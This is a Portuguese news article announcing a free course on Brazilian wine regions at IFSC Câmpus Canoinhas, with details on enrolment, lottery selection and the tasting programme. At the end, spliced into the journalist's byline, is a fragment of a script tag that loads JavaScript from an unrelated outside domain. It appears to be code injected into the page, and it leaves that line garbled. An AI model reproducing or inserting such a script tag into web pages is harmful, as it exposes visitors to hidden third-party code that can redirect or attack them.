InícioDestaqueIFSC-Canoinhas Abre Inscrições para Curso de Enografia Brasileira

IFSC-Canoinhas Abre Inscrições para Curso de Enografia Brasileira

Últimas notícias

Senado aprova isenção de IR para quem ganha até dois salários mínimos

O Senado aprovou nesta quarta-feira (17) o projeto de...

Mega-Sena sorteia nesta quinta-feira prêmio acumulado em R$ 72 milhões

As seis dezenas do concurso 2.714 da Mega-Sena serão...

Pinhão, pipoteca e maconha; Polícia militar prende traficante em Três Barras

Na quarta-feira, 17, por volta das 18h10, policiais militares...

Inscrições vão até dia 24 e curso será no dia 31 de agosto

 

Os vinhos e espumantes nacionais ganharam o mercado e o gosto dos brasileiros. Segundo dados do Instituto Brasileiro do Vinho (Ibravin), no primeiro semestre deste ano, a comercialização de vinhos e espumantes produzidos no Brasil foi de 92,7 milhões de litros – 75% a mais que os 53 milhões de litros importados. Para quem trabalha na área de gastronomia e bebidas e apreciadores de vinho, saber quais são as regiões produtoras e suas características é um diferencial importante. Por isto, o Instituto Federal de Santa Catarina (IFSC) realiza no Câmpus Canoinhas, no dia 31 de agosto, mais um minicurso gratuito sobre vinhos, desta vez sobre Enografia Brasileira.

 

As inscrições estão abertas e devem ser feitas até o próximo dia 24, pela internet, no Sistema Integrado de Gestão de Atividades Acadêmicas (Sigaa). Podem participar profissionais da área de gastronomia e bebidas, alunos e servidores do IFSC e membros da comunidade externa, com mais de 18 anos. São 15 vagas disponíveis e a seleção será por sorteio.

 

Com carga horária de oito horas, o curso será dividido em três partes: apresentação do mercado de vinhos no Brasil e no mundo; aula teórica sobre as características agronômicas e enológicas das diferentes regiões produtores de uva e vinho no Brasil; e aula prática com a degustação guiada de vinhos elaborados nas diversas regiões vitícolas brasileiras – Campanha Gaúcha, Serra do Sudeste, Serra Gaúcha, Campos de Cima da Serra, Altitude Catarinense, Região Metropolitana de Curitiba e Vale do São Francisco.

 

Segundo o professor de Agroecologia do IFSC e coordenador do curso, Douglas André Wurz, enografia é a ciência humana que estuda as propriedades dos vinhos de uma determinada região, definida geograficamente, e que se caracterizam pela relação com o solo, o clima, as castas e as práticas vitícolas e enológicas utilizadas nessa região. Também contam a legislação a que a produção está submetida e as relações com as pessoas, sejam econômicas, religiosas, gastronômicas ou culturais.

 

Além de capacitar os participantes sobre o tema, o curso de Enografia Brasileira também tem como objetivos a valorização do vinho nacional, difusão da uva e do vinho na região e incentivo ao cultivo de videiras na região, como alternativa viável para a agricultura familiar no Planalto Norte catarinense.

 

Por Liane Dani | Jornalista do IFSC… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.